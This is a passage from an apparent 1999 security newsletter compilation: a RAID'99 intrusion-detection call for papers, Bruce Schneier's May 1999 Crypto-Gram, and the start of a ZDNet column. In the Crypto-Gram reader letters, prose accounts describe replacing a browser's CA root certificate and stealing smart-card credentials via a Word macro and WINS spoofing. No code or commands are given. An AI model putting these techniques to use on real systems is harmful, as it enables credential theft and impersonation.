Emergency Response Service
This workshop, the second in an ongoing annual series, will bring
together leading figures from academia, government, and industry to
discuss state-of-the-art intrusion detection technologies, and
paradigms and issues from the research and commercial perspectives.
The RAID International Workshop series is intended to further progress
in intrusion detection by promoting the exchange of ideas in a broad
range of topics among researchers, system developers, and users and by
encouraging links between these groups. RAID'98, held in
Louvain-la-Neuve, Belgium, was the first in an anticipated annual
series of international workshops that has brought together leading
figures from academia, government, and industry to ponder the current
state of intrusion detection technologies and paradigms from the
research and commercial perspectives. More than 130 participants
attended RAID'98, with nearly 50% from outside Europe, reflecting the
international nature of the meeting.
RAID'99 is being hosted by the Purdue University CERIAS, in West
Lafayette, Indiana, USA. The program committee invites submission of
both technical and general interest papers and panels from those
interested in formally presenting their ideas during the
workshop. This year, we are emphasizing following topic areas:
Assessing IDS
Accuracy and reliability measurements, requirements, and
technologies
Benchmarking techniques and technologies
Relations to Risk Assessment and Risk Management Plans
IDS in High Performance and Real-Time Environments
Large-scale/enterprise IDS
High-Speed networks
Managing high-volume data
Highly distributed and heterogeneous environments
Vulnerabilities and Attacks
New vulnerability or attack databases
Vulnerability or attack taxonomies
Using vulnerability databases
IDS Integration
IDS interoperability Standards and Standardization - progress
and
assessment
Integration with the system/network management framework
Combining different "styles" of IDS
Innovative Approaches
Adaptive IDS solutions
Survivability and Dependability
Data mining, intelligent agents
New results related to innovative ways of thinking about IDS,
new IDS
methodologies and technologies
Automated responses
Combining IDS and system/network management
Practical Considerations
Case studies
IDS in heterogeneous environments
Unique/emerging IDS operating environments, including CORBA, NT,
X.509 and VPN.
Legal issues (IDS reports as "evidence")
Commercial intrusion detection systems and their directions
Real-time versus Post-mortem IDS
IDS integration with business process
Program Committee
*****************
General Chair: Gene Spafford (Purdue University, USA)
Program Chair: Deborah Frincke (University of Idaho, USA)
Program Co-Chair: Ming-Yuh Huang (Boeing Applied Research and
Technology, USA)
Executive Committee
*******************
Marc Dacier (IBM Zurich Research Laboratory, Switzerland)
Kathleen Jackson (Los Alamos National Laboratory, USA)
Committee Members
*****************
Matt Bishop (University of California at Davis, USA)
Dick Brackney (National Security Agency, USA)
Yves Deswarte (LAAS-CNRS & INRIA, France)
Terry Escamilla (IBM, USA)
Rowena Chester (University of Tennessee, USA)
Tim Grance (National Institute of Standards and Technology, USA)
Sokratis Katsikas (University of the Aegean, Greece)
Baudouin Le Charlier (Universite de Namur, Belgium)
Abdelaziz Mounji (Universite de Namur, Belgium)
Jean-Jacques Quisquater (Universite Catholique de Louvain, Belgium)
Marv Schaefer (Arca Systems, USA)
Mark Schneider (National Security Agency, USA)
Steve Smaha (Free Agent, USA)
Peter Sommer (London School of Economics & Political Science, England)
Stuart Staniford-Chen (Silicon Defense, USA)
Chris Wee (University of California at Davis, USA)
Kevin Ziese (Cisco/Wheelgroup, USA)
SUBMISSIONS
===========
Papers and panels which fall into the topic areas outlined above are
particularly welcome, although contributions outside those topics may
also be of interest. Each submission must contain:
1. A separate title page with:
The type of submission,
The title or topic,
The topic category most appropriate for the subject matter;
The name(s) of the speaker or panel chair and probable panelists,
with their organizational affiliation(s), telephone and FAX numbers,
postal address, and Internet electronic mail address.
2. A brief biography of each author or panel participant as appropriate
3. The subject category (see topic list) most appropriate for the
paper or panel
Paper submissions must include an abstract that is a maximum of 600
words in length on a separate page. This abstract may be accompanied by
a lengthier paper, which should be no more than ten pages (12 point
font). Although encouraged, it is not necessary to submit a full paper
for consideration as a speaker or for inclusion in the proceedings;
however, potential speakers providing full paper submissions will be
given preference in cases of equal quality. The program committee will
allocate each accepted presenter up to 30 minutes for the talk, based
on the complexity and interest of the proposed topic and the wishes of
the speaker. The presenter will be informed of the presentation slot
length when notified of acceptance.
Panel submissions must include a description that is a maximum of 300
words. The description should include both an outline of the format of
the panel and a short rationale for the panel. The program committee
will allocate one to two-hour time slots to each panel, based on the
proposed topic, the number of panelists, and the wishes of the panel
chair. The panel chair will be informed of the slot length when
notified of acceptance. Panels which include time for general
discussion and questions/answers for the panelists and the attendees
are preferred to those which do not.
All proposals must be in English. Plan to give all panels and talks in
English.
All submissions must be received on or before May 21. We strongly
prefer they be submitted electronically to raid99@zurich.ibm.com or
raid99@cs.uidaho.edu using one of these formats: ASCII, postscript,
Word, or LaTex. All abstracts will be made available on the web. For
those submitting full papers, these submissions should be in a format
which can be translated to PDF . Full papers will also be made
available on the web, and possibly by CD-ROM. If necessary, hardcopy
may be sent to the nearest of the following locations (please allow
sufficient time for arrival by May 21):
European Collection Site
Marc Dacier
Global Security Analysis Lab
IBM Zurich Research Laboratory
Saeumerstrasse 4 CH-8803
Rueschlikon Switzerland
North/South American Collection Site
Ming-Yuh Huang
The Boeing Company
P.O. Box 3707 MC 7L-20
Seattle WA 98124-2207
U.S.A.
Each submission will be acknowledged by e-mail. If acknowledgment is
not received within seven days, please contact raid99@cs.uidaho.edu.
A preliminary program will be available at the RAID web site,
http://www.zurich.ibm.com/pub/Other/RAID/, by July 21, 1999. Last
year's proceedings are available online as well.
CORPORATE SPONSORS
==================
We solicit interested organizations to become sponsors for RAID '99,
particularly in sponsorship of student travel and other expenses for
RAID. Please contact Deborah Frincke for information regarding
corporate sponsorship of RAID.
REGISTRATION
============
Detailed registration information (including fees, suggested hotels,
and travel directions) will be provided at the RAID'99 web site.
PROCEEDINGS
===========
On-line workshop proceedings will be posted on the RAID web site
immediately following the workshop. It will include:
The final program;
A list of corporate sponsors;
A list of attendees (subject to each attendee's approval);
The submitted abstract and slides used by each speaker;
The submitted description and rationale for each panel;
The slides used by each panelist; and,
Written position statements from each panelist.
Last year's most outstanding workshop participants were invited to
submit an analogous formal paper to a special RAID edition of the
refereed journal "Computer Networks and ISDN Systems." Proceedings
from last year may be found at online at
http://www.zurich.ibm.com/pub/Other/RAID/.
IMPORTANT DATES
===============
Deadline for paper, panel submissionMay 21, 1999
Notification of acceptance or rejection July 7, 1999
Registration opens July 15, 1999
Preliminary program posted to web July 15, 1999
Final full paper due (optional)August 7, 1999
On-time Registration closes August 21, 1999
RAID dates September 7-9, 1999
FOR MORE INFORMATION
====================
For further information:
On-site arrangements:
contact Gene Spafford (spaf@cs.purdue.edu)
General program information or corporate sponsorship:
contact Deborah Frincke (frincke@cs.uidaho.edu)
Paper and panel submission:
contact Ming-Yuh Huang (huang@bcstec.ca.boeing.com)
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
39.0 Cryptogram May 15th'99
~~~~~~~~~~~~~~~~~~~~~~
CRYPTO-GRAM
May 15, 1999
by Bruce Schneier
President
Counterpane Systems
schneier@counterpane.com
http://www.counterpane.com
A free monthly newsletter providing summaries, analyses, insights, and
commentaries on cryptography and computer security.
Back issues are available at http://www.counterpane.com. To subscribe or
unsubscribe, see below.
Copyright (c) 1999 by Bruce Schneier
** *** ***** ******* *********** *************
In this issue:
The Internationalization of Cryptography
News
Federal Appeals Court Agrees that Encryption Export
Rules are Unconstitutional
The Doghouse -- Novell NetWare's Remote Passwords
U.S. Crypto Legislation Update
Counterpane Systems News
Factoring with TWINKLE
Comments from Readers
** *** ***** ******* *********** *************
The Internationalization of Cryptography
One of the stranger justifications of U.S. export controls is that they
prevent the spread of cryptographic expertise. Years ago, the
Administration argued that there were no cryptographic products available
outside the U.S. When several studies proved that there were hundreds of
products designed, built, and marketed outside the U.S., the Administration
changed its story. These products were all no good, they argued. Export
controls prevent superior American products from getting into foreign
hands, forcing them to use inferior non-U.S. products.
Nonsense.
Cryptography is an international science. Most of the cryptographic
conferences are held outside the U.S. Most of the cryptography
researchers are at universities outside the U.S., and most cryptographic
papers presented at conferences are written outside the U.S. There are
more advanced degree programs in cryptography outside the U.S. than there
are inside. Researchers outside the U.S. tend to be better funded, and
there is more interest in their work. Some of the most important
cryptographic research ideas in the past ten years have come from outside
the U.S. The U.S. not only does not have a lock on cryptographic research,
it does not even have the majority.
In 1997, NIST solicited algorithms for the Advanced Encryption Standard, to
replace DES as a government encryption standard. Of the fifteen
submissions received, ten were from companies and universities outside the
U.S: Australia, Belgium, Canada, Costa Rica, England, France, Germany,
Israel, Japan, Korea. Of the five submissions likely to be chosen for the
next round, about half will be from outside the U.S. It is very possible
that the next U.S. government encryption standard will have been designed
outside the U.S.
The Internet Engineering Task Force has created a series of cryptographic
standards for the Internet: secure e-mail, encrypted and authenticated IP
packets, secure socket-level communications, key exchange and certificate
formats, etc. These meetings are held several times a year, mostly in the
U.S. but also outside. Attendees are from companies all over the world,
and the standards are written by international consensus. The U.S. has no
lock on the content of the standards, nor the evaluation process. These
standards are implemented in products built all over the world, not just in
the U.S. For example, a Finnish company called SSH has one of the best
IPSec -- a standard for IP security -- implementations in the world.
Other non-U.S. technology has been integrated into U.S. companies. A
Swedish company called COST built a comprehensive cryptographic toolkit.
The company was acquired by Entegrity Solutions, Inc., a U.S. startup.
Algorithmic Research, and its cryptographic products, was acquired by
Cylink Corp. ELVIS+, a Russian company, is now part of the U.S. company
TrustWorks, Inc. RSA Data Security, now owned by Security Dynamics Inc.,
recently purchased the rights to a cryptographic product created in
Australia. This list goes on and on. Again and again, U.S. companies have
realized that cryptographic expertise is available outside the U.S., and
have taken steps to secure that expertise.
Cryptography does not stop at national borders. Research, standards, and
products are international. Expertise is international. For the U.S.
Administration to believe that there are "national secrets" about
cryptography that export controls somehow keep inside the U.S. is sheer
folly. There is no evidence that this is true, and considerable evidence
that the reverse is true.
** *** ***** ******* *********** *************
News
Cyberwar is becoming real, maybe. It seems that hackers in Belgrade have
attacked NATO's public Web server. Now there's a big difference between
attacking a Web site and attacking actual war-fighting computers, but still...
http://www.pcworld.com/cgi-bin/pcwtoday?ID=10358
See also:
http://www.zdnet.com/zdnn/stories/news/0,4586,2220773,00.html
And hackers have done damage in protest to to NATO's accidental bombing of
the Chinese embassy in Belgrade. A number of U.S. government sites were
hacked, including those of the Department of the Interior, the Department
of Energy, and the U.S. embassy in China.
http://www.zdnet.com/zdnn/stories/news/0,4586,2256138,00.html
This item is more interesting, if it's true. According to this news
report, which I can't confirm anywhere, the Serbs used a CIA mobile phone
and security identification codes to call in a NATO air strike on a
civilian convoy.
http://www.theherald.co.uk/news/archive/19-4-1999-0-9-58.html
More credible is the story that the Serbs are eavesdropping on NATO
unencrypted radio links.
http://www.washingtonpost.com/wp-srv/WPlate/1999-05/01/169l-050199-idx.html
A cat lost an English bus company a £20,000 contract after falling asleep
on a fax machine and sending confidential information to a rival firm.
http://www.telegraph.co.uk/et?ac=000647321007942&rtmo=Q9Qw9p3R&atmo=KKKKKKrM
&pg=/et/99/4/19/ncat19.html
KeyNote v2, a toolkit for handling trust management issues, has been
released in beta. KeyNote is a small, flexible trust management system
designed by Matt Blaze, Joan Feigenbaum, and others, suitable for
Internet-style applications.
KeyNote description:
ftp://ftp.research.att.com/dist/mab/knrfc.txt
Beta release of the KeyNote toolkit:
http://www.cis.upenn.edu/~angelos/keynote.html
Crypto++ 3.1, a free C++ crypto class library, has just been released.
This version fixes some bugs and adds more AES candidates as well as a
couple of MAC constructions based on block ciphers.
http://www.eskimo.com/~weidai/cryptlib.html
Starium will soon be selling voice encryption add-ons for telephones.
They'll be using 2048-bit Diffie-Hellman for key exchange, and triple-DES
for voice encryption. Price will be around $100. And unlike AT&T, these
guys probably won't bend to government pressure to add key escrow to their
protocols (remember Clipper).
http://www.starium.com
See also:
http://www.eetimes.com/story/OEG19990423S0015
This is a terrifying one. A U.S.-led international organization of police
and security agencies is trying to push through laws to mandate
eavesdropping points for Web sites and other forms of digital
communication. "The plans require the installation of a network of tapping
centers throughout Europe, operating almost instantly across all national
boundaries, providing access to every kind of communications including the
net and satellites. A German tapping center could intercept Internet
messages in Britain, or a British detective could listen to Dutch phone
calls. There could even be several tapping centers listening in at once.
The full story:
http://www.heise.de/tp/english/special/enfo/6398/1.html
Another story:
http://www.newsunlimited.co.uk/The_Paper/Weekly/Story/0,3605,45981,00.html
Also see:
http://www.heise.de/tp/english/special/enfo/6397/1.html
The document is Enfopol 19, a restricted document leaked to the
London-based Foundation for Information Policy Research:
http://www.fipr.org/polarch/index.html
Cool Internet Explorer security bugs:
Someone else using your computer can see where you've been browsing.
Someone else using your computer can access your password-protected Web sites.
http://www.zdnet.com/anchordesk/story/story_3351.html
http://www.zdnet.com/zdnn/stories/news/0,4586,1014586,00.html
Think computer privacy is a problem? Here's how it works in the real
world. This was originally published in the 14 March 1999 New York Times
magazine section.
http://archives.nytimes.com/archives/search/fastweb?getdoc+allyears2+db365+3
25093+0+wAAA+fiber-optic%7Econfessional
Visa has issued a draft of the "Visa Smart Card Protection Profile," as
part of the Common Criteria. It contains a very nice list of smart card
attacks. The document is a draft, and they want comments.
http://www.visa.com/nt/chip/accept.html
http://jya.com/drpp-v.pdf
The Visa document references the Common Criteria:
http://csrc.ncsl.nist.gov/cc/
The IC2000 report on communications interception and ECHELON, the U.S.
satellite surveillance network, was approved as a working document by the
Science and Technology Options Assessment Panel of the European Parliament
(STOA) at their meeting in Strasbourg on 6 May 1999. The document is
public, and very interesting.
Report:
http://www.iptvreports.mcmail.com/stoa_cover.htm
http://jya.com/ic2000.zip
News story:
http://www.wired.com/news/news/politics/story/19602.html
A man has been sentenced to seven and one half years for hacking $6M out of
slot machines.
http://www.wired.com/news/news/technology/story/19433.html
** *** ***** ******* *********** *************
Federal Appeals Court Agrees that Encryption
Export Rules are Unconstitutional
The story so far: Dan Bernstein wanted to publish the details and source
code to Snuffle, an algorithm of his. Export rules prevented him from
doing so. He took this to court. About a year and a half ago, Judge Patel
agreed with him and ruled the export rules unconstitutional. The
government requested a stay, which was granted. The case was appealed to
the Federal Ninth Circuit Court of Appeals...
...which just agreed with Judge Patel's decision.
Briefly, the Court agreed that source code can be (though isn't always)
"expressive," and thus qualifies as speech for the purpose of the First
Amendment. Thus, the Export Administration Regulations (EAR) is a prior
restraint on free speech. While such things can be legal, they bear a
heavy burden; EAR does not meet that burden, because (among other things)
it grants unbridled discretion to the government, it provides no firm time
limits for the process, and it bars judicial review.
Despite the fact that their reasoning was narrowly focused on expressive
source code, they struck down the entire rule on crypto export because the
rule doesn't distinguish between expressive source, functional source, and
object code, and they can't (and shouldn't) do a line-by-line rewrite of
the EAR. They also said that government efforts to control cryptography,
in addition to being a First Amendment issue, may also be in conflict with
the Fourth Amendment, the right to speak anonymously, the right against
compelled speach, and the right to informational privacy.
This does not mean that it is suddenly legal to export cryptography out of
the U.S. Judge Patel issued declaratory and injunctive relief, but it was
almost immediately stayed. The Ninth Circuit Court of Appeals affirmed her
decision, but that Court's mandate does not issue until the time for
petitioning for rehearing runs (14 days). This will almost undoubtedly be
stayed, as the government asks the Supreme Court to hear the case. The
conservative among us will wait before exporting source code.
Wired articles:
http://www.wired.com/news/news/politics/story/19553.html?wnpg=1
http://www.wired.com/news/news/politics/story/19571.html
http://www.wired.com/news/news/politics/story/19605.html
The decision:
http://jya.com/bernstein-9th.htm
An excellent summary and analysis:
http://www.law.miami.edu/~froomkin/bernstein99.htm
** *** ***** ******* *********** *************
The Doghouse -- Novell NetWare's Remote Passwords
Novell NetWare 5 (and 4.11 and 4.2) has a feature that allows
administrators to remotely manage Novell servers. These administrative
accounts are protected by passwords, and the password are encrypted on the
servers. Unfortunately, the encryption algorithm doesn't work.
According to a hacker named TheRuiner, the password file is only protected
with some obfuscation, bit realignment, subtraction, value substitution,
and an XOR cipher. It's pretty trivial to break, and all it really took
was for someone to reverse-engineer the code and see exactly how it worked.
This isn't rocket science, guys. Password protection is a solved problem:
use a strong hash function. I'm not sure why Novell wasn't paying attention.
News story:
http://www.infoworld.com/cgi-bin/displayNew.pl?/security/990426sw.htm
Details are at:
http://oliver.efri.hr/~crv/security/bugs/Others/nware12.html
** *** ***** ******* *********** *************
U.S. Crypto Legislation Update
Once again, the U.S. Congress is trying to enact legislation to relax
export controls on computer hardware and software that include encryption.
The hope is that actual laws will eventually replace the ITAR regulations,
which are not laws and have never been voted on.
On March 24, the House Judiciary Committee approved H.R. 850, the "Security
And Freedom through Encryption" (SAFE) Act. We like this bill; it
generally relaxes export controls on encryption software. On the minus
side, it also includes a controversial provision that creates a new
criminal offense for using encryption during a crime. But on the plus
side, the Committee rejected an attempt by Rep. Bill McCollum (R-FL) to
introduce an amendment that would have limited relaxation to those
encryption products that have key-escrow (or whatever they are calling it
these days).
The bill is sponsored by Congressman Robert Goodlatte (R-VA) and
Congresswoman Zoe Lofgren (D-CA) (both great people who deserve our
support) and currently has 251 co-sponsors, including the Republican and
Democrat leaders. Republican leaders sent a "Dear Colleague" letter to all
members of Congress last week urging passage of the bill. Unfortunately,
it has now been referred to the Commerce, International Relations, Armed
Services, and Intelligence Committees for further review. If you remember
back to 1997, the House Armed Services and Intelligence Committees both
revised a similar bill -- at the request of the FBI -- to impose
restrictions on crypto products; their efforts to pass that gutted bill
were defeated with help from industry and public interest groups. Majority
Leader Dick Armey has told Rep. Goodlatte that he expects the legislation
to be voted on by the House by summer; we'll have to wait and see.
There is also some progress in the Senate this year. In a surprising
turnaround, Senator John McCain (R-AZ) has reversed his previous support
for domestic encryption restrictions and introduced a bill to slightly
relax export controls. His new bill, S. 798, "Promote Reliable On-Line
Transactions to Encourage Commerce and Trade" (PROTECT) Act of 1999 relaxes
export controls on products with 64-bit keys or less. Restrictions are
also relaxed on publicly traded companies, regulated or regularly audited
companies (such as banks or insurance companies), subsidiaries of U.S.
companies and strategic partners, online merchants, and governments in
NATO, OECD and ASEAN (a weird choice).
Products that have longer keys than 64 bits can be exported if a new
Encryption Export Advisory Board and the Secretary of Commerce approve the
exports after finding that "the product or service is...generally
available, publicly available; or an encryption product utilizing the same
or greater key length or otherwise providing comparable security is, or
will be within the next 12 months generally or widely available outside the
United States from a foreign supplier." Decisions will be subject to
judicial review.
The bill requires the National Institute of Standards and Technology to
finish the Advanced Encryption Standard (AES) selection by January 1, 2002.
After the AES is selected, products that incorporate the AES or have an
equivalent strength may be exportable without a license in most cases.
The bill also prohibits mandatory access to encryption keys or key recovery
information by the United States government or the government of any state.
However, it also contains provisions that require NIST to assist law
enforcement in enhancing access to cryptography and intrusion detection
systems.
The bill has been referred to the Senate Commerce Committee, where Senator
McCain is Chairman. It is also co-sponsored by Senators Leahy (D-VT),
Burns (R-MT), Kerry (D-MA), Abraham (R-MI), and Wyden (D-OR).
It promises to be an interesting year in Congress.
SAFE Act:
http://thomas.loc.gov/cgi-bin/query/z?c106:H.R.850.IH:
PROTECT ACT:
http://thomas.loc.gov/cgi-bin/query/z?c106:S.798.IS:
(This article was co-written with David Banisar.)
** *** ***** ******* *********** *************
Counterpane Systems News
Rootfest '99. Bruce Schneier will be speaking at RootFest, a hackers'
convention on 21-23 May 1999, in Minneapolis.
http://www.rootfest.org/
NetSec '99. At 8:00 AM on 15 June, Bruce Schneier will give the keynote
speech at NetSec '99 in St. Louis. Schneier will also be speaking about
securing legacy applications at 2:00 that afternoon.
http://www.gocsi.com/conf.htm
** *** ***** ******* *********** *************
Factoring with TWINKLE
At Eurocrypt '99, Adi Shamir presented a new machine that could increase
our factoring speed by about 100-1000 times. Called TWINKLE (The Weizmann
INstitute Key Locating Engine), this device brings 512-bit keys within the
realm of our ability to factor.
The best factoring algorithms known to date all work on similar principles.
First, there is a massive parallel search for equations with a certain
relation. This is known as the sieving step. Then, after a certain number
of relations are found, there is a massive matrix operation to solve a
linear equation and produce the prime factors. The first step can easily
be paralleled -- recently, 200 computers worked in parallel for about four
weeks to find relations to help factor RSA-140 -- but the second has to be
done on a single supercomputer: it took a large Cray about 100 hours and
810 Mbytes of memory to factor RSA-140.
Shamir conceptualized a special hardware device that uses electro-optical
techniques to sieve at speeds much faster than normal computers. He
encodes various LEDs with values corresponding to prime numbers, and then
uses it to factor numbers. The machine reminds me of the famous Difference
Engine of the 1800s. Once the engineering kinks are worked out -- and
there are considerable ones -- this machine will be as powerful as 100-1000
PCs for about $5000. The basic idea is not new; a mechanical-optical
machine built by D.H. Lehmer in the 1930s did much the same thing (although
quite a bit more slowly).
As far as we know, Shamir's machine is never been built. (I can't speak
for secret organizations.) As I said, Shamir presented a conceptualization
and a sketch of a design, not a full set of engineering blueprints. There
are all sorts of details still to be figured out, but none of them seem
impossible. If I were running a multi-billion-dollar intelligence
organization, I would turn my boffins loose at the problem.
The important thing to note is that this new machine does not affect the
matrix step at all. And this step explodes in complexity for large
factoring problems; its complexity grows much faster than the complexity of
the sieving step. And it's not just the time, it's the memory
requirements. With a 1024-bit number, for example, the matrix step
requires something like ten terabytes of memory: not off-line storage, but
real computer memory. No one has a clue how to solve that kind of problem.
This technique works just as well for discrete-logarithm public-key
algorithms (Diffie-Hellman, ElGamal, DSA, etc.) as it does for RSA,
although it is worth noting that the matrix problem is harder for
discrete-log problems than it is for factoring. The technique does not
apply to elliptic-curve-based algorithms, as we don't know how to use the
sieving-based algorithms to solve elliptic-curve problems.
In "Applied Cryptography," I talked about advances in factoring coming from
four different directions. One, faster computers. Two, better networking.
Three, optimizations and tweaks of existing factoring algorithms. And
four, fundamental advances in the science of factoring. TWINKLE falls in
categories one and three; there is no new mathematics in this machine, it's
just a much faster way of doing existing mathematics.
Shamir's contribution is obvious once you understand it (the hallmark of a
brilliant contribution, in my opinion), and definitely changes the
landscape of what public-key key sizes are considered secure. The moral is
that it is prudent to be conservative -- all well-designed security
products went beyond 512-bit moduli years ago -- and that advances in
cryptography can come from the strangest places.
Shamir's paper:
http://jya.com/twinkle.eps
The RSA Data Security opinion:
http://www.rsa.com/rsalabs/html/twinkle.html.
** *** ***** ******* *********** *************
Comments from Readers
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Subject: Attacking Certificates with Computer Viruses
>So if you're a paranoid computer-security professional,
>the obvious question to ask is: can a rogue piece of
>software replace the root-level certificates in my browser
>and trick me into trusting someone? Of course it can.
You don't even need rogue software, all you need is Internet Explorer. Try
this: Using your favorite certificate toolkit, create a CA root certificate
which is identical to an existing one (except for the key) and stick it in
a web page. Click on the link with MSIE. You'll be presented with a
dialog telling you you're about to accept a new certificate from, for example,
"Verisign Class 1 Public Primary Certification Authority". Once you've
clicked OK (as virtually all users will), you've replaced the standard CA
root with your own one, and can use it to certify rogue servers, CA's,
email, viruses, and whatever else you feel like. There's no warning
presented by MSIE, it just quietly replaces the existing cert.
(Hint: You may want to test this with one of the lesser-used CA's rather
than Verisign, because even ignoring the security implications it's a
significant denial-of-service attack. This hole may have been fixed in
newer versions of MSIE, but it worked fine in 3.02, which is the last
version which doesn't try to take over your machine when you install it).
From: Ed Gerck <egerck@mcg.org.br>
Subject: Re: Smart Card Threats
I enjoyed reading your paper on smart-card security issues (Cryptogram
Apr/15/1999). I find it specially useful since it provides yet more
examples where trust cannot be seen as an objective property of a system,
not even for some of its parts. I believe the same applies to all systems,
though -- however unperceived in most cases. Smart-cards are thus IMO no
better and no worse in principle than a computer on the Net. Trust is
essentially subjective and thus any recognizable part of any system can
operate within its own and different trust truth-conditions -- potentially
leading to different trust-values when in interaction with other parts,
perhaps from other systems and also differently for each other part,
history, and time. At the end, the main question is thus not whether it is
a smart-card or a computer on your desk -- but whether you can rely upon it
for your decisions (i.e., trust it within a specific extent and epoch, for
specific trust-points). Which may be easier to accept for a smart-card
that you always carry with you in contrast to a computer that you never
see, such as a server -- but not necessarily, as your paper exemplifies.
I would like to comment also on another part of your newsletter, where you
have the title "Trusting the Known" -- since, of course, no one can trust
the unknown. IMO, the gist of your text is "Trusting with Qualification"
which introduces the discussion on the *degree* of such qualification as
you then proceed to do. I also note that it is possible to trust without
qualification on the trusted matter itself, even though you must know it --
and that such may even apply to what you analyzed, as when a spy in a
spy-ring trusts the key handed down by the spymaster, in an objective way
as an "authorization" and entirely based on his trust on the spymaster...
not on the key's qualifications.
From: jmm@elegant.com (John Macdonald)
Subject: "In cryptography, there is security in following the crowd"
Careful how you phrase that. As written, it could easily be used to
justify choosing Microsoft PPP rather than IPSec because that is where "the
crowd" has lead.
Nobody who reads and understands the article would consider the masses
generally unknowledgeable about cryptography to be the right "crowd" to
follow of course, but I shudder to think of this article being read by a
marketing droid looking for the catch-phrases for his next ad campaign, or
a purchasing agent being challenged about an all-Microsoft buying policy.
From: hecker@netscape.com (Frank Hecker)
Subject: Re: CRYPTO-GRAM, April 15, 1999
>Other Internet protocols -- S/MIME, SSL, etc. -- take a more
>hierarchical approach. You probably got your public key
>signed by a company like Verisign. A Web site's SSL public
>key might have been signed by Netscape.
>This attack isn't without problems. If a virus replaces the
>root Netscape certificate with a phony one....
For the record, Netscape does not sign web sites' public keys (i.e., act as
a Certificate Authority for them); I don't believe Netscape has ever
performed this service. Thus there is no "root Netscape certificate"
included in the Netscape Navigator and Netscape Communicator products, if
by that you mean a certificate for a hypothesized Netscape CA. Netscape
Navigator and Netscape Communicator as shipped do include root CA
certificates for a number of public CA services, and we recommend that our
customers use those services (unless they wish to act as their own CA).
This doesn't of course change the underlying argument of your article,
concerning the vulnerability to replacement of the include root certificate
list; I just wanted to correct a minor error of fact.
From: "hans@netman.se" <hans@netman.se>
Subject: Smart-Card Flaws
For the last 2.5 years I've been responsible for the security issues when
implementing a large Smart Card based authorization concept for Windows NT
4.0 here in Sweden and here are 3 major flaws I've encountered when dealing
with smart cards:
1) When connecting to a NT server your user name, password and X509v3
certificate are sent to the server. The server starts a challenge response
using the public key in the certificate and encrypts a random value. The
encrypted random value and the server certificate are then sent to the
smart card and decrypted with the corresponding private key. Then the
smart card encrypts the random value with the server's public key in the
server certificate and sends it back to the server, which compares the two
values. Since there is no connection between the value in the X509
certificate (subject field and Common Name) and the user ID you may enter
some other person's ID and password which are sent with your certificate.
So the strong authentication will begin using your Public and private RSA
keys but you will get the other person's privileges and access rights!
2) On an RSA based smart card you usually store the user id and password on
the data area (SSO table = Single Sign On Table) -- the problem lies in the
fact that the smart cards offered today are limited in storage data, such
as certificates and user IDs and passwords, to 8K maximum. (You may find
cards on the market that can store more than 8K data but you can't buy them
yet.) So if we use certificates with RSA based keys stored in them, which
are 1024 bits long, you may only have 2 certificates and 2 corresponding
private keys. If we use RSA based keys stored in a smart card that are 512
bits long, we can store 3 certificates in them. And since 512 bit RSA keys
are in the Wassenaar agreement and you may export them, you can't trust
them :-). So we used 1024 bits keys instead and used them for
authentication and encryption. So the following will then happen. You
enter the PIN that opens the card AND opens for usage of the certificate
and private key for authentication/encryption since we want to do a strong
authentication of the user. I can then decrypt anything that the user of
the smart card has encrypted since the usage of the private key is opened
by the user when he enters his PIN! If I can get the user to execute a
Trojan horse program the user will not even know that I'm decrypting
something he encrypted with his private key! Therefore you can't encrypt
the user id and the password stored on the smart card! So I can read this
from the smart card and get user id and the corresponding password and
email it to me! (I've done this once using just Visual Basic for
Application and a macro stored in the normal.dot)
3) If we do a challenge response in a NT environment the server needs to
know which work station/server he is talking to. So in your case the
server program used WINS to get the IP-address from the workstation name.
This opened to a nice attack:
The user logged in on a NT workstation using his smart card and was
authenticated by challenge response. We sent a email to the user that
included a macro in the normal.dot and got the workstation's name from the
workstation, and user id and password from the smart card. We then got
another NT workstation and named it as the user's workstation name and
tried to get a connection to a disk on the NT server. We were prompted
for user ID and password, which we entered and voila! We got access to the
disk! The server in this case got the workstation name, the user id and
password and used WINS to find the corresponding IP address for that
workstation name. Then the server did a strong authentication on the IP
address that the server got from WINS. That IP address was not our
machine's IP address, it was the user's IP address! In the NT security log
we could read that the user logged in to that disk and that he was
authenticated by the use of strong authentication.
So the question is: Can you rely on Smart Cards? And my answer is: Yes, if
you know what they can do and what they can't!
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
Counterpane Systems is a six-person consulting firm specializing in
cryptography and computer security. Counterpane provides expert consulting
in: design and analysis, implementation and testing, threat modeling,
product research and forecasting, classes and training, intellectual
property, and export consulting. Contracts range from short-term design
evaluations and expert opinions to multi-year development efforts.
http://www.counterpane.com/
Copyright (c) 1999 by Bruce Schneier
@HWA
40.0 [ISN] Why i'm a security pessimist
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Traumatic Dog <waste@zor.hut.fi>
Why I'm a Security Pessimist
URL: http://chkpt.zdnet.com/chkpt/adem2fpf/www.anchordesk.com/story/story_3377.html
Jesse Berst, Editorial Director
ZDNet AnchorDesk
Wednesday, May 12, 1999
We're still in the primitive days of the Internet. So we still expect some
security problems. And we assume they'll get better. Right? Wrong.
The security problem is getting worse. Headlines tell me Internet security
lapses are becoming more common. Even the White House isn't safe. Click for
more. And Melissa showed us viruses are growing more wily. We're all at the
mercy of corner-cutting software vendors, inexperienced e-tailers and smart-ass
programmers.
WHY YOU ARE MORE VULNERABLE
There's no single culprit. Much of it has to do with changing times:
As the Internet is more widely used, the potential for good and bad increases By
expanding networks, companies create more opportunity for security breaches As
competition gets more intense, vendors push products out the door faster As
product complexity increases, bugs are more likely As ecommerce explodes,
vendors are rushing to set up shop online
WHERE YOU ARE MOST VULNERABLE
Computer users are being impacted at work, at home, online:
The number of software bugs tracked in the BugNet database grew nearly 20-fold
